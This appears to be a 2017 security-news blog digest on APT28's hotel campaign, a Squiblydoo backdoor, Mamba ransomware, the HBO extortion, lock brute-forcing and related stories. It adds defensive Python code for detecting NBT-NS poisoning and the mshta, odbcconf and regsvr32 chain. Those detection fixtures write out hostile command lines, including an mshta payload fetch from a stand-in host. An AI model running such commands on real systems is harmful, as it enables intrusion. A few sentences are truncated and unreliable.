Saturday, August 12, 2017

APT28 hackers are leveraging an NSA hacking tool to spy on hotel guests

According to FireEye, the notorious Russia-linked APT28 group (also known as Pawn Storm, Fancy Bear, Sofacy, Sednit and Strontium) is behind an ongoing campaign targeting hotels in several European countries.
The researchers observed many attacks on hotel networks aimed at gaining access to the devices of government and business travelers via the guest Wi-Fi.
The hackers targeted several companies in the hospitality sector, including hotels in seven European countries and at least one in a Middle Eastern country.
The attack chain starts with a spear phishing email sent to a hotel employee; the messages carry a weaponized document named “Hotel_Reservation_Form.doc.” The embedded macros decode a dropper that delivers the GameFish malware. Experts noticed that the backdoor is the same one used by APT28 in a recent campaign that targeted Montenegro after the country officially joined the NATO alliance despite strong opposition from the Russian Government, which had threatened to retaliate.
Once the hackers accessed the target network, they used the NSA-linked EternalBlue SMB exploit for lateral movement. According to the malware researchers at FireEye, this is the first time APT28 has been observed using this NSA exploit.
“APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers. Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim’s network via credentials likely stolen from a hotel Wi-Fi network.” reads the analysis published by FireEye.
The APT28 hackers also used the open source penetration testing tool Responder for NetBIOS Name Service (NBT-NS) poisoning.
“Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder. Responder facilitates NetBIOS Name Service (NBT-NS) poisoning.
This technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine. APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network,” continues FireEye.
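The poisoning FireEye describes can be caught with a canary: the following Python probe, an added example that is not part of the original post or of FireEye's report, broadcasts an NBT-NS query for a name that cannot exist on the segment and treats any positive answer as a poisoner, since an honest network stays silent. The canary name, the transaction id and the 192.0.2.10 reply embedded for the offline check are constructed values.

```python
"""Canary probe for NBT-NS poisoners such as Responder (added example).
A poisoner answers every NBT-NS query with its own address, so a query for a
name that cannot exist that still gets a positive reply identifies it. The
builder and parser are pure functions so they can be checked offline;
probe() does the actual broadcast."""
import os
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020          # NetBIOS general name service record
QCLASS_IN = 0x0001
CANARY = "NOSUCHHOST-XYZ"  # constructed name (14 chars), never registered anywhere

def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 section 14.1): upper-case, space-pad to
    15 bytes, append the suffix byte, then split each byte into two nibbles and
    add ord('A') to each, giving one 32-byte label."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    label = bytearray()
    for b in raw:
        label.append(ord("A") + (b >> 4))
        label.append(ord("A") + (b & 0x0F))
    return bytes([32]) + bytes(label) + b"\x00"

def build_nbns_query(name: str, txid: int) -> bytes:
    """NAME QUERY REQUEST: header plus one question, flagged as a broadcast."""
    # flags 0x0110: OPCODE=0 (query), RD=1, B=1; QDCOUNT=1, other counts 0
    header = struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_netbios_name(name) + struct.pack("!HH", QTYPE_NB, QCLASS_IN)

def _skip_name(data: bytes, pos: int) -> int:
    """Advance past a (possibly compressed) NetBIOS name starting at pos."""
    while pos < len(data):
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:      # compression pointer, two bytes
            return pos + 2
        pos += 1 + length
    return pos

def parse_nbns_response(data: bytes, expected_txid: int) -> list:
    """IPs announced in a positive NAME QUERY RESPONSE for our transaction id;
    [] for anything else (wrong id, negative reply, truncated packet)."""
    if len(data) < 12:
        return []
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    # need our id, the response bit, RCODE 0 (non-zero = "name not found"), an answer
    if txid != expected_txid or not flags & 0x8000 or flags & 0x000F or ancount == 0:
        return []
    pos = 12
    for _ in range(qdcount):           # skip an echoed question section, if any
        pos = _skip_name(data, pos) + 4
    ips = []
    for _ in range(ancount):
        pos = _skip_name(data, pos)
        if pos + 10 > len(data):
            break
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        rdata = data[pos:pos + rdlen]
        pos += rdlen
        if rtype != QTYPE_NB:
            continue
        # RDATA is a list of (NB_FLAGS 2 bytes, NB_ADDRESS 4 bytes) entries
        for off in range(0, len(rdata) - 5, 6):
            ips.append(socket.inet_ntoa(rdata[off + 2:off + 6]))
    return ips

def probe(canary: str = CANARY, timeout: float = 2.0) -> list:
    """Broadcast the canary query and return the source IPs that answered it."""
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    poisoners = []
    try:
        sock.sendto(build_nbns_query(canary, txid), ("255.255.255.255", NBNS_PORT))
        while True:                    # keep reading until the timeout fires
            data, (src, _) = sock.recvfrom(1024)
            if parse_nbns_response(data, txid):
                poisoners.append(src)  # src claims a name that does not exist
    except socket.timeout:
        pass
    finally:
        sock.close()
    return poisoners

# Constructed sample: the positive reply a poisoner at 192.0.2.10 (a TEST-NET
# address) would send for transaction id 0x1234; lets the parser run offline.
SAMPLE_TXID = 0x1234
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", SAMPLE_TXID, 0x8500, 0, 1, 0, 0)  # response, AA, RD set
    + encode_netbios_name(CANARY)
    + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, 165, 6)      # TTL 165, 6-byte RDATA
    + b"\x00\x00" + socket.inet_aton("192.0.2.10")           # NB_FLAGS, NB_ADDRESS
)
```

Run probe() from a host on the guest or staff segment; a non-empty result names a machine answering for a name nobody owns, which is exactly the behaviour Responder exhibits.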
The researchers reported details of an intrusion that occurred in 2016: a user connected to a hotel’s Wi-Fi and, 12 hours later, APT28 hackers used the stolen credentials to access his network and his Outlook Web Access (OWA) account.
This isn’t the first time hackers have targeted travelers; the best-known case is the DarkHotel APT. That group targeted European hotels hosting participants in the Iranian nuclear negotiations, and according to some reports, hackers spied on high-profile people visiting Russia and China.
“Cyber espionage activity against the hospitality industry is typically focused on collecting information on or from hotel guests of interest rather than on the hotel industry itself, though actors may also collect information on the hotel as a means of facilitating operations,” FireEye said. “Business and government personnel who are traveling, especially in a foreign country, must often rely on less secure systems to conduct business than at their home office, or may be unfamiliar with the additional threats posed while abroad.”

Malware campaign targets Russian-Speaking companies with a new Backdoor

Security experts at Trend Micro have spotted a new cyber espionage campaign that has been active for at least two months and is targeting Russian-speaking enterprises, delivering a new Windows-based backdoor.
The hackers leverage several exploits and Windows components to run malicious scripts while avoiding detection. The latest sample associated with this attack was uploaded to VirusTotal on June 6, 2017, and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.
Hackers are targeting financial institutions and mining firms with different spear phishing messages.
The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.
Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.
“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point, is controlled by the attacker and was registered in early July.” states the analysis published by Trend Micro.
“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”
The JavaScript code calls odbcconf.exe, a legitimate Windows executable, to run a DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.
The DLL then launches a Squiblydoo attack, which abuses Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.
“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”
In May, experts at FireEye spotted a new APT group, tracked as APT32, that was targeting Vietnamese interests around the globe; those hackers leveraged the Squiblydoo technique to download a backdoor from APT32 infrastructure.
Next, the real backdoor is downloaded and executed. It is an XML file downloaded from the domain wecloud[.]biz and, again, it is executed through the same Regsvr32-abusing Squiblydoo technique.
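A defender can hunt for this mshta, odbcconf and Regsvr32 chain in process-creation telemetry. The Python rules below are an added example, not Trend Micro's code; the Sysmon-style field names (Image, ParentImage, CommandLine), the file paths and the example.invalid URL in the constructed events are assumptions.

```python
"""Flag the LOLBin chain from the write-up (mshta -> odbcconf -> regsvr32)
in process-creation events (added example). Event records are constructed
below in a Sysmon-like shape; the field names are an assumption."""
import re
import shlex

def image_name(path: str) -> str:
    """Strip the directory part of a Windows path and lower-case the file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_squiblydoo(img: str, cmd: str) -> bool:
    """regsvr32 loading scrobj.dll with an /i: scriptlet argument. The scriptlet
    may be an http(s) URL or a local file under any extension (.txt here)."""
    c = cmd.lower()
    return img == "regsvr32.exe" and "scrobj.dll" in c and "/i:" in c

def is_odbcconf_regsvr(img: str, cmd: str) -> bool:
    """odbcconf.exe /A {REGSVR <dll>} loads an arbitrary DLL into odbcconf."""
    return img == "odbcconf.exe" and re.search(r"/a\s*\{\s*regsvr\s", cmd, re.I) is not None

def is_mshta_nonhta(img: str, cmd: str) -> bool:
    """mshta.exe given a URL or a file that is not .hta: the header is ignored
    and the content runs as an HTML Application (the fake .xls in this campaign)."""
    if img != "mshta.exe":
        return False
    try:
        args = shlex.split(cmd, posix=False)   # keeps backslashes and quotes as-is
    except ValueError:                         # unbalanced quotes: crude fallback
        args = cmd.split()
    if len(args) < 2:
        return False
    target = args[1].strip('"').lower()
    return target.startswith(("http://", "https://")) or not target.endswith(".hta")

RULES = [
    ("squiblydoo_regsvr32", is_squiblydoo),
    ("odbcconf_regsvr", is_odbcconf_regsvr),
    ("mshta_nonhta_payload", is_mshta_nonhta),
]

# parent -> child pairs that have no business occurring on a workstation
SUSPICIOUS_PARENTS = {
    ("winword.exe", "mshta.exe"),      # Office exploit (CVE-2017-0199) launching mshta
    ("excel.exe", "mshta.exe"),
    ("mshta.exe", "odbcconf.exe"),
    ("odbcconf.exe", "regsvr32.exe"),  # the DLL loaded by odbcconf spawns regsvr32
}

def evaluate(event: dict) -> list:
    """Names of every rule the event trips; empty list when it looks clean."""
    img = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = [name for name, check in RULES if check(img, cmd)]
    parent = image_name(event.get("ParentImage", ""))
    if (parent, img) in SUSPICIOUS_PARENTS:
        hits.append(f"unexpected_parent:{parent}->{img}")
    return hits

def scan(events: list) -> list:
    """(index, hits) for every event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((i, hits))
    return out

# Constructed events mirroring the chain described above; the last one is a
# benign control registration that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe https://example.invalid/m11.xls"},
    {"Image": r"C:\Windows\System32\odbcconf.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"odbcconf.exe /A {REGSVR C:\Users\u\AppData\Roaming\x.dll}"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\odbcconf.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:C:\Users\u\AppData\Roaming\x.sct.txt scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx"},
]
```

Feeding real Sysmon event id 1 records through scan() gives one finding per stage, so even if the scriptlet under %APPDATA% is renamed to .txt the regsvr32 command line still betrays it.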
“This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It attempts to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:
  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands
” reads the analysis.
Experts noted that, although the attack chain appears complex, it starts with a Microsoft Office exploit. The best defense still consists of patching and keeping software up to date.

Mysterious company is offering up to $250,000 for VM Hacks through a bug bounty

A mysterious company makes the headlines for offering up to $250,000 for virtual machine (VM) hacks. The “secret” bug bounty program was announced by the crowdsourced security testing platform Bugcrowd.
At the time of writing, the only information available about the target is that it is an unreleased product.
The program is invitation-only, but anyone can apply for an invite; the organization will then contact the final participants.
“Bugcrowd has an exciting opportunity to participate in a private, invite-only program with an undisclosed client, against an unreleased product – with rewards up to $250,000!” reads the announcement published on Bugcrowd. 
Candidates must have specific skills on virtual environments, kernel and device driver security, firmware security, and advanced application security.
The hackers must focus their activities on:
  • Guest VM breakout/isolation failures
  • Code execution beyond the confines of your guest VM
  • Privilege escalation within the guest VM made possible by the underlying platform
  • Any vulnerabilities which could lead to compromise or leakage of data and directly affect the confidentiality or integrity of user data of which affects user privacy (including memory corruption, cross guest VM issues, persistent issues).
  • Denial/degrading service to other customers, or of the underlying platform itself (excluding DDoS)
Participants can earn between $5,000 and $250,000 for each vulnerability they report; the bug bounty program will run for roughly 8 weeks, starting in September.
Bug bounty programs are becoming ever more common in the IT security industry, and VM hacks are among the issues experts consider most interesting. Last year, security experts earned $150,000 for the hack of VMware Workstation 12.5.1 reported at the 2016 PwnFest hacking contest, held in South Korea at the 2016 Power Of Community (POC) security conference.
This year, during the Pwn2Own contest, the researchers of Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that could be used by attackers to escape VMs.

Friday, August 11, 2017

Wikileaks – CIA CouchPotato remote tool can stealthily collect RTSP/H.264 video streams

“Today, August 10th 2017, WikiLeaks publishes the User Guide for the CouchPotato project of the CIA. CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. It utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.” states WikiLeaks.
The document leaked from the CIA details how the tool could be used by cyber spies to remotely capture RTSP/H.264 video streams.
The Real Time Streaming Protocol (RTSP) is a network control protocol designed for controlling streaming media servers.
“CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. CouchPotato utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity.” reads the user guide. “In order to minimize size of the DLL binary, many of the audio and video codecs along with other unnecessary features have been removed from the version of ffmpeg that CouchPotato is built with. pHash, an image hashing algorithm, has been incorporated into ffmpeg’s image2 demuxer to provide image change detection capabilities. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.”
The CouchPotato tool utilizes FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.
The CouchPotato tool is hard to detect: it supports the file-less ICE v3 “Fire and Collect” loader, an in-memory code execution (ICE) technique.
The documents don’t include details on how the CIA operators compromise the target systems. It is likely the CouchPotato tool needs to be used in conjunction with other hacking tools to penetrate the targeted systems.

A Self-driving car can be easily hacked by just putting stickers on road signs

We have discussed car hacking many times; it is a scary reality, and the numerous hacks devised by security experts have demonstrated that it is possible to compromise modern connected cars.
The latest hack demonstrated by a team of experts is very simple and effective: a sticker attached to a sign can confuse a self-driving car and potentially lead to an accident.
The hack was devised by a group of researchers from the University of Washington, who explained that an attacker can print stickers and attach them to a few road signs to deceive “most” autonomous cars into misinterpreting those signs.
The sign alterations in the researchers’ tests were very small; even though they can go unnoticed by humans, the algorithm used by the camera’s software interpreted the road sign in the wrong way.
The problem affects the image recognition system used by most self-driving cars, as explained in a research paper titled “Robust Physical-World Attacks on Machine Learning Models.”
“Given these real world challenges, an attacker should be able to account for the above changes in physical conditions while computing perturbations, in order to successfully physically attack existing road sign classifiers. In our evaluation methodology, we focus on three major components that impact how a road sign is classified by, say, a self-driving car.” reads the paper.
The experts demonstrated different tricks to interfere with the mechanisms implemented in modern self-driving cars to read and classify road signs, just using a color printer and a camera.
In the Camouflage Graffiti Attack, the experts simply added stickers with the words “Love” and “Hate” onto a “STOP” sign. The autonomous car’s image-detecting algorithms were not able to recognize the road sign and interpreted it as a Speed Limit 45 sign in 100 percent of test cases.
A similar camouflage was tested on a RIGHT TURN sign and the cars wrongly classified it as a STOP sign in 66 percent of the cases.
The researchers also tried a Camouflage Abstract Art Attack, applying smaller stickers onto a STOP road sign. In this case the camouflage interfered with the car’s systems, which interpreted the road sign as street art 100 percent of the time.
“Our attack reports a 100% success rate for misclassification with 66.67% of the images classified as a Stop sign and 33.7% of the images classified as an Added Lane sign. It is interesting to note that in only 1 of the test cases was the Turn Right in the top two classes.” reads the paper. “In most other cases, a different warning sign was present. We hypothesize that given the similar appearance of warning signs, small perturbations are sufficient to confuse the classifier. In future work, we plan to explore this hypothesis with targeted classification attacks on other warning signs.”
The experts did not reveal the manufacturer of the self-driving car they used in their tests; in any case, their research demonstrates the importance of improving the safety and security of such vehicles.

Mamba ransomware is back and targets organizations in Brazil and Saudi Arabia

Mamba ransomware was one of the first malware families detected in public attacks that encrypts entire hard drives rather than individual files.
Mamba relies on a disk-level encryption strategy instead of the conventional file-based one.
A similar ransomware, called Petya, made the headlines for the recent massive attack and its disk encryption strategy. The first samples of Mamba ransomware discovered in the wild used an open source full disk encryption tool called DiskCryptor to strongly encrypt the data.
Mamba mostly targeted organizations in Brazil; it was also used by crooks in the attack against the San Francisco Municipal Transportation Agency that occurred in November.
Researchers at Kaspersky Lab discovered a new wave of attacks leveraging the Mamba ransomware that hit organizations in Brazil and Saudi Arabia.
Like the massive NotPetya attack, Mamba appears to have been designed for sabotage; it is unclear whether the malware was developed by crooks or by a nation-state actor.
Unlike in the NotPetya attacks, it cannot be excluded that Mamba victims could decrypt their data.
“Authors of wiper malware are not able to decrypt victims’ machines. For example, if you remember the ExPetr [malware], it uses a randomly generated key to encrypt a victim machine, but the trojan doesn’t save the key for further decryption,” said Kaspersky Lab researcher Orkhan Memedov. “So, we have a reason to call it ‘a wiper.’ However, in case of Mamba the key should be passed to the trojan as a command line argument, it means that the criminal knows this key and, in theory, the criminal is able to decrypt the machine.”
Mamba was first spotted in September 2016, when experts at Morphus Labs discovered the infection of machines belonging to an energy company in Brazil with subsidiaries in the United States and India.
The researchers shared a detailed analysis on Security Affairs, explaining that once the malware has infected a Windows machine, it overwrites the existing Master Boot Record with a custom MBR and encrypts the hard drive using the DiskCryptor tool.
“Unfortunately there is no way to decrypt data that has been encrypted with the DiskCryptor utility, because this legitimate utility uses strong encryption algorithms,” explained Kaspersky Lab.
The latest samples of Mamba ransomware show an unusual ransom note: instead of demanding money like the original Mamba, it provides two email addresses and an ID number to be used to recover the encryption key.
The threat actor behind the new wave of Mamba ransomware attacks leverages the PSEXEC utility to execute the malware on the corporate network once it has penetrated it. PSEXEC is the same tool used by NotPetya to spread within target networks.
The attack chain described by Kaspersky has two phases. In the first one, the attackers drop the DiskCryptor tool into a new folder created by the malware; persistence is obtained by registering a system service called DefragmentService, after which the system is rebooted.
The second phase sets up the new bootloader and encrypts disk partitions using DiskCryptor, then the machine is rebooted.
“It is important to mention that for each machine in a victim’s network, the threat actor generates a password for the DiskCryptor utility,” Kaspersky Lab said in its report. “This password is passed via command line arguments to the ransomware dropper.”

Cyber criminals demand HBO millions to stop leaking its material

Crooks claiming to have hacked television group HBO networks were demanding millions of dollars in ransom payments from the company while threatening to release more material.
The alleged hackers published a five-minute video letter to HBO chief Richard Plepler claiming to have “obtained valuable information” in a cyber attack. Cyber criminals said they had stolen 1.5 terabytes of data.
The author of the message, calling himself “Mr. Smith,” confirmed his group obtained “highly confidential” documents and data, including scripts, contracts, and personnel files.
According to the website Databreaches.net, on Monday hackers leaked 10 files including what appears to be another script of the fantasy series “Game of Thrones.”
Along with the video letter, the hackers released 3.4GB of files. The dump contained technical data related to HBO’s internal network and administrator passwords, and of course the draft scripts of five Game of Thrones episodes. The huge trove of files also includes a month’s worth of emails from HBO’s vice president for film programming, Leslie Cohen.
The hackers claim the compromise of the HBO network took a long effort, six months to break into the company’s systems; they also claim to spend $500,000 a year on zero-day exploits that let them hack the firm by exploiting flaws in Microsoft and other software used by HBO.
The crooks demand half of the HBO group’s annual budget of $12 million to $15 million to stop leaking the files.
“We want XXX dollars to stop leaking your data,” the message reads. “HBO spends 12 million for Market Research and 5 million for GOT7 advertisements. So consider us another budget for your advertisements!”
The video message comes a few days after a leak of one script of “Games of Thrones” and clips from other series.
The hackers claim HBO was their 17th victim and that “only 3 of our past targets refused to pay and were punished very badly and 2 of them collapsed entirely.”
HBO fears that the hackers will leak further material and says that “the forensic review is ongoing.”
“While it has been reported that a number of emails have been made public, the review to date has not given us a reason to believe that our email system as a whole has been compromised,” the statement from the Time Warner unit said. “We continue to work around the clock with outside cybersecurity firms and law enforcement to resolve the incident.”

Adobe patches 80 vulnerabilities in its products, including Flash Player, Reader, and Acrobat

Adobe released security updates for its Flash Player, Reader, Acrobat, Digital Editions and Experience Manager products. The company addressed more than 80 vulnerabilities.
Adobe has updated Flash Player to version 26.0.0.151 on all platforms; this release addresses only two vulnerabilities: a serious security bypass flaw, tracked as CVE-2017-3085, that can lead to information disclosure, and a critical type confusion flaw (CVE-2017-3106) that can lead to remote code execution.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical type confusion vulnerability that could lead to code execution and an important security bypass vulnerability that could lead to information disclosure.” reads the security advisory.
The experts Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero were credited for the code execution vulnerability, while the information disclosure issue was reported by Björn Ruytenberg via ZDI.
Adobe has announced the end of life of Flash Player by the end of 2020.
Adobe fixed 69 vulnerabilities in Reader and Acrobat versions 2017.009.20058, 2017.008.30051 and 2015.006.30306 and earlier on Windows and Mac.
The security updates fix flaws rated Critical and Important that could be exploited by hackers to take control of the affected system.
The list of flaws includes critical memory corruption, use-after-free, heap overflow, and type confusion vulnerabilities; according to Adobe they can be exploited for remote code execution, and some of them can lead to information disclosure.
The flaws were discovered and reported by external independent researchers, many of them via Trend Micro’s Zero Day Initiative (ZDI); the expert Ke Liu of Tencent’s Xuanwu Lab was credited with the highest number of issues.
Adobe released new versions of Flash Player and Connect web conferencing software to fix important and critical vulnerabilities.
Adobe also patched three moderate and important severity vulnerabilities in the Experience Manager enterprise content management product. The flaws could be exploited by attackers for information disclosure and arbitrary code execution; the vulnerabilities were reported to Adobe anonymously.
“Adobe has released security updates for Adobe Experience Manager. These updates resolve a moderate filetype validation vulnerability (CVE-2017-3108) and two moderate information disclosure vulnerabilities (CVE-2017-3107 and CVE-2017-3110).” reads the advisory.
Adobe addressed 9 vulnerabilities with the latest updates for the Windows, Mac, iOS and Android versions of the Adobe Digital Editions ebook reader; they were reported by Steven Seeley of Source Incite, Jaanus Kääp of Clarified Security, and Riusksk of Tencent.
Two flaws, tracked as CVE-2017-11274 and CVE-2017-11272, have been rated critical: they can lead to code execution and information disclosure.
Adobe is not aware of attacks in the wild exploiting the above issues.

Black Hat 2017 – Hacking the electronic locks to open the doors could be easy

Many times we have seen hackers and spies in movies breaking electronic locks with some kind of electronic gadget: a pocket device that in a few seconds is able to try all the possible combinations and find the correct one to open the door.
At the Black Hat 2017 hacker conference, the expert Colin O’Flynn presented an interesting report on breaking electronic door locks.
O’Flynn focused his analysis on two models of home electronic locks and found the first model vulnerable to so-called Evil Maid attacks. The attacker needs physical access to the lock’s internal components to add their own code, which then opens the door whenever they need.
The curious thing is that step-by-step instructions on how to add the code are reported right inside the battery compartment.
The expert noticed that the system lacks any authentication for entering a new code: no user code or master code is requested.
The second model is vulnerable to a different attack, from the outside. The outer part of the lock contains a module with a touch-screen for entering a PIN code; the module can be easily pried off by the attacker with a common knife to reach the connector behind it.
After studying how the external and internal parts of the lock interact, O’Flynn devised a device that looks exactly like the one used by hackers in the movies.
The device could be used to brute-force the combination by connecting it directly to the connector. The attack works because there is no authentication in place to check which component is communicating with the connector.
The expert noticed a security measure implemented by the electronic lock manufacturer against brute-force attacks: after more than three incorrect tries, the device triggers an alarm.
Nevertheless, O’Flynn discovered that it was possible to reset the counter of the failed-attempts by applying a certain voltage to the external connector’s contacts and causing the system reboot.
O’Flynn built a device that can check roughly 120 codes per minute; trying all possible four-digit PIN combinations for the electronic lock, the entire process can take about 85 minutes in the worst case. The expert explained that in most cases a half-hour to an hour is enough for the hack.
O’Flynn also devised a method to discover the six-digit master code with an improved brute-force attack. Normally a week would be necessary to discover a six-digit code, but the expert noticed that when the first four of the six digits of the master code are entered, the system either shows an error message or waits for the other two digits, confirming to the attacker that the first four digits are correct.
This method requires 85 minutes to brute-force the first four numbers of the master code and one minute more for the remaining two numbers. The attacker can then use the master code to reset the access code.
O’Flynn reported the issues to the electronic lock manufacturer, who confirmed that they will be fixed as soon as possible.
Electronic locks are still not totally secure!

Hotspot Shield VPN threatens your privacy by injecting ads and JS into browsers

The digital rights advocacy group Center for Democracy & Technology (CDT) urged US federal trade authorities to investigate VPN provider AnchorFree for deceptive trade practices.
AnchorFree provides the Hotspot Shield VPN app, claiming it protects users from online tracking, but, according to a complaint filed with the FTC, the application gathers data and shares it as described in its privacy policy.
“The Center for Democracy & Technology asks the Federal Trade Commission (Commission) to investigate the data security and data sharing practices of Hotspot Shield Free Virtual Private Network (VPN) services, a product of AnchorFree, Inc. Hotspot Shield Free VPN promises secure, private, and anonymous access to the internet. As detailed below, this complaint concerns undisclosed and unclear data sharing and traffic redirection occurring in Hotspot Shield Free VPN that should be considered unfair and deceptive trade practices under Section 5 of the FTC Act.” reads the complaint.
The VPN service injects ads and JavaScript code for advertising purposes into users’ browsers when they are connected through Hotspot Shield, exposing them to online monitoring.
“Hotspot Shield tells customers that their privacy and security are ‘guaranteed’ but their actual practices starkly contradict this,” said Michelle De Mooy, Director of CDT’s Privacy & Data Project, in a statement. “They are sharing sensitive information with third party advertisers and exposing users’ data to leaks or outside attacks.”
The experts who analyzed the application’s source code discovered that the company uses several tracking libraries, which is curious considering the company’s motto is “Don’t let ISPs monetize your web history: Use Hotspot Shield.”
“Contrary to Hotspot Shield’s claims, the VPN has been found to be actively injecting JavaScript codes using iframes for advertising and tracking purposes. An iframe, or “inline frame,” is an HTML tag that can be used to embed content from another site or service onto a webpage; iframes are frequently used to insert advertising, but can also be used to inject other malicious or unwanted code onto a webpage. Further analysis of Hotspot Shield’s reverse-engineered source code revealed that the VPN uses more than five different third-party tracking libraries, contradicting statements that Hotspot Shield ensures anonymous and private web browsing.” continues the complaint.
The CDT claims the VPN application gathers location data to optimize its advertising features, and it collects IP addresses, unique device identifiers, and other information (SSID/BSSID network names, MAC addresses, and device IMEI numbers).
Although IP addresses and unique device identifiers are private personal information, AnchorFree’s Privacy Policy explicitly exempts this data from its definition of Personal Information.
“Importantly, the Privacy Policy makes clear that neither IP addresses nor unique device identifiers are considered to be personal information by Hotspot Shield” states the complaint.
The CDT filing argues AnchorFree collects more data than VPN service providers normally need for their operations.

FireEye Provides Update on the alleged data breach revealed late July

In late July, hackers posted details allegedly stolen from a system belonging to Adi Peretz, a Senior Threat Intelligence Analyst at security firm FireEye/Mandiant.
The leaked archive is a 337MB PST file containing the expert’s emails. The leaked archive also includes images of his accounts, including OneDrive, Live and LinkedIn, geo-tracking of personal devices for at least a year, billing records and PayPal receipts.
“In addition to that are images detailing the compromise of their One Drive account, Live account, LinkedIn account, geo-tracking of personal devices for at least a year, billing records and PayPal receipts, credentials for an engineering portal at FireEye, WebEx and JIRA portals, as well as Live and Amazon accounts. There are also records related to an alleged customer, Bank Hapoalim, and internal documentation and presentations, including one for the IDF (Israel Defense Forces) from 2016.” reported Salted Hash.
The security firm has denied any intrusion in its systems, while the hackers who published the alleged Mandiant Internal Leaks claimed it was part of the ongoing campaign #OpLeakTheAnalyst.
Today FireEye provided an update on the event following its investigation into allegations made earlier this week that FireEye had been breached. As background, on July 31,
According to the security firm, the hackers did not breach the company network or Adi Peretz’s personal or corporate computers.
The login credentials used by Peretz were exposed in the past in numerous data breaches, including LinkedIn.
The experts discovered that the attackers started using the stolen credentials to access several of the Victim’s personal online accounts (LinkedIn, Hotmail and OneDrive accounts) in September 2016.
The documents publicly released were obtained from the Victim’s personal online accounts and many of them were already available online.
Below is the list of conclusions published by FireEye in a blog post.
  • The Attacker did not breach, compromise or access our corporate network, despite multiple failed attempts to do so.
  • The Attacker did not breach, compromise or access the Victim’s personal or corporate computers, laptops or other devices.
  • We confirmed the Victim’s passwords and/or credentials to his personal social media and email accounts were among those exposed in at least eight publicly disclosed third party breaches (including LinkedIn) dating back to 2016 and earlier.
  • Starting in September 2016, the Attacker used those stolen passwords and/or credentials to access several of the Victim’s personal online accounts, including LinkedIn, Hotmail and OneDrive accounts.
  • The Attacker publicly released three FireEye corporate documents, which he obtained from the Victim’s personal online accounts.
  • All of the other documents released by the Attacker were previously publicly available or were screen captures created by the Attacker.
